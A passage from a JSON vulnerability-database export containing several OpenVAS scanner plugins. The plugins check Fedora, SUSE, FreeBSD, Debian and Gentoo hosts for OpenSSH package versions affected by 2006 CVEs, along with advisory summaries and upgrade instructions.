"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssh FEDORA-2007-395\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SSH (Secure SHell) is a program for logging into and executing\n commands on a remote machine. SSH is intended to replace rlogin and\n rsh, and to provide secure encrypted communications between two\n untrusted hosts over an insecure network. X11 connections and\n arbitrary TCP/IP ports can also be forwarded over the secure channel.\n\n OpenSSH is OpenBSD's version of the last free version of SSH, bringing\n it up to date in terms of security and features, as well as removing\n all patented algorithms to separate libraries.\n \n This package includes the core files necessary for both the OpenSSH\n client and server. To make this package useful, you should also\n install openssh-clients, openssh-server, or both\";\n\ntag_affected = \"openssh on Fedora Core 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00011.html\");\n script_id(861319);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:23:18 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-395\");\n script_cve_id(\"CVE-2006-5052\", \"CVE-2006-5794\", \"CVE-2006-4924\", \"CVE-2006-5051\");\n script_name( \"Fedora Update for openssh FEDORA-2007-395\");\n\n script_summary(\"Check for the Version of openssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/openssh\", rpm:\"x86_64/openssh~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/openssh-server\", rpm:\"x86_64/openssh-server~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/openssh-clients\", rpm:\"x86_64/openssh-clients~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/openssh-askpass\", rpm:\"x86_64/openssh-askpass~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/openssh-debuginfo\", rpm:\"x86_64/debug/openssh-debuginfo~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/openssh-server\", rpm:\"i386/openssh-server~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/openssh-askpass\", rpm:\"i386/openssh-askpass~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/openssh-clients\", rpm:\"i386/openssh-clients~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/openssh-debuginfo\", rpm:\"i386/debug/openssh-debuginfo~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/openssh\", rpm:\"i386/openssh~4.3p2~4.12.fc5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:22", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssh\n openssh-askpass\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5019505 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65248", "id": "OPENVAS:65248", "title": "SLES9: Security update for OpenSSH", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5019505.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for OpenSSH\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssh\n openssh-askpass\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5019505 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65248);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-4925\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for OpenSSH\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~4.1p1~11.28\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-08T11:44:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-06:22.openssh.asc", "modified": "2017-12-07T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57476", "id": "OPENVAS:57476", "title": "FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)", "type": "openvas", "sourceData": "#\n#ADV FreeBSD-SA-06:22.openssh.asc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n#\n\ntag_insight = \"OpenSSH is an implementation of the SSH protocol suite, providing an\nencrypted, authenticated transport for a variety of services,\nincluding remote shell access.\n\nThe CRC compensation attack detector in the sshd(8) daemon, upon receipt\nof duplicate blocks, uses CPU time cubic in the number of duplicate\nblocks received. [CVE-2006-4924]\n\nA race condition exists in a signal handler used by the sshd(8) daemon\nto handle the LoginGraceTime option, which can potentially cause some\ncleanup routines to be executed multiple times. [CVE-2006-5051]\";\ntag_solution = \"Upgrade your system to the appropriate stable release\nor security branch dated after the correction date\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-06:22.openssh.asc\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-06:22.openssh.asc\";\n\n \nif(description)\n{\n script_id(57476);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-4924\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n name = \"FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n family = \"FreeBSD Local Security Checks\";\n script_family(family);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdpatchlevel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\nif(patchlevelcmp(rel:\"6.1\", patchlevel:\"10\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"6.0\", patchlevel:\"15\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"5.5\", patchlevel:\"8\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"5.4\", patchlevel:\"22\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"5.3\", patchlevel:\"37\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"4.11\", patchlevel:\"25\")<0) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-26T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57470", "id": "OPENVAS:57470", "title": "FreeBSD Ports: openssh", "type": "openvas", "sourceData": "#\n#VID 32db37a5-50c3-11db-acf3-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n openssh openssh-portable\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.openssh.com/txt/release-4.4\nhttp://www.vuxml.org/freebsd/32db37a5-50c3-11db-acf3-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57470);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\");\n script_bugtraq_id(20216);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: openssh\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"openssh\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4,1\")<0) {\n txt += 'Package openssh version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"openssh-portable\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.p1,1\")<0) {\n txt += 'Package openssh-portable version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update to openssh (1:3.8.1p1-8.sarge.6)\nannounced via advisory DSA 1212-1.\n\nTwo denial of service vulnerabilities have been found in the OpenSSH\nserver.\n\nCVE-2006-4924\nThe sshd support for ssh protcol version 1 does not properly\nhandle duplicate incoming blocks. This could allow a remote\nattacker to cause sshd to consume significant CPU resources\nleading to a denial of service.\n\nCVE-2006-5051\nA signal handler race condition could potentially allow a remote\nattacker to crash sshd and could theoretically lead to the\nability to execute arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57585", "id": "OPENVAS:57585", "title": "Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1212_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1212-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge), these problems have been fixed in\nversion 1:3.8.1p1-8.sarge.6\n\nFor the unstable and testing distributions, these problems have been\nfixed in version 1:4.3p2-4\n\nWe recommend that you upgrade your openssh package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201212-1\";\ntag_summary = \"The remote host is missing an update to openssh (1:3.8.1p1-8.sarge.6)\nannounced via advisory DSA 1212-1.\n\nTwo denial of service vulnerabilities have been found in the OpenSSH\nserver.\n\nCVE-2006-4924\nThe sshd support for ssh protcol version 1 does not properly\nhandle duplicate incoming blocks. This could allow a remote\nattacker to cause sshd to consume significant CPU resources\nleading to a denial of service.\n\nCVE-2006-5051\nA signal handler race condition could potentially allow a remote\nattacker to crash sshd and could theoretically lead to the\nability to execute arbitrary code.\";\n\n\nif(description)\n{\n script_id(57585);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\");\n script_bugtraq_id(20216,20241);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"3.8.1p1-8.sarge.6\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh\", ver:\"3.8.1p1-8.sarge.6\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:05", "bulletinFamily": "scanner", "description": "The remote host is missing an update to openssh-krb5\nannounced via advisory DSA 1189-1.\n\nSeveral remote vulnerabilities have been discovered in OpenSSH, a free\nimplementation of the Secure Shell protocol, which may lead to denial of\nservice and potentially the execution of arbitrary code. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2006-4924\n\nTavis Ormandy of the Google Security Team discovered a denial of\nservice vulnerability in the mitigation code against complexity\nattacks, which might lead to increased CPU consumption until a\ntimeout is triggered. This is only exploitable if support for\nSSH protocol version 1 is enabled.\n\nCVE-2006-5051\n\nMark Dowd discovered that insecure signal handler usage could\npotentially lead to execution of arbitrary code through a double\nfree. The Debian Security Team doesn't believe the general openssh\npackage without Kerberos support to be exploitable by this issue.\nHowever, due to the complexity of the underlying code we will\nissue an update to rule out all eventualities.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57483", "id": "OPENVAS:57483", "title": "Debian Security Advisory DSA 1189-1 (openssh-krb5)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1189_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1189-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 3.8.1p1-7sarge1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.3p2-4 of openssh. openssh-krb5 will soon be converted towards\na transitional package against openssh.\n\nWe recommend that you upgrade your openssh-krb5 packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201189-1\";\ntag_summary = \"The remote host is missing an update to openssh-krb5\nannounced via advisory DSA 1189-1.\n\nSeveral remote vulnerabilities have been discovered in OpenSSH, a free\nimplementation of the Secure Shell protocol, which may lead to denial of\nservice and potentially the execution of arbitrary code. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2006-4924\n\nTavis Ormandy of the Google Security Team discovered a denial of\nservice vulnerability in the mitigation code against complexity\nattacks, which might lead to increased CPU consumption until a\ntimeout is triggered. This is only exploitable if support for\nSSH protocol version 1 is enabled.\n\nCVE-2006-5051\n\nMark Dowd discovered that insecure signal handler usage could\npotentially lead to execution of arbitrary code through a double\nfree. The Debian Security Team doesn't believe the general openssh\npackage without Kerberos support to be exploitable by this issue.\nHowever, due to the complexity of the underlying code we will\nissue an update to rule out all eventualities.\";\n\n\nif(description)\n{\n script_id(57483);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1189-1 (openssh-krb5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"3.8.1p1-7sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:20", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200611-06.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57919", "id": "OPENVAS:57919", "title": "Gentoo Security Advisory GLSA 200611-06 (openssh)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several Denial of Service vulnerabilities have been identified in OpenSSH.\";\ntag_solution = \"All OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/openssh-4.4_p1-r5'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200611-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=149502\nhttp://www.openssh.com/txt/release-4.4\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200611-06.\";\n\n \n\nif(description)\n{\n script_id(57919);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-5051\", \"CVE-2006-5052\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200611-06 (openssh)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/openssh\", unaffected: make_list(\"ge 4.4_p1-r5\"), vulnerable: make_list(\"lt 4.4_p1-r5\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 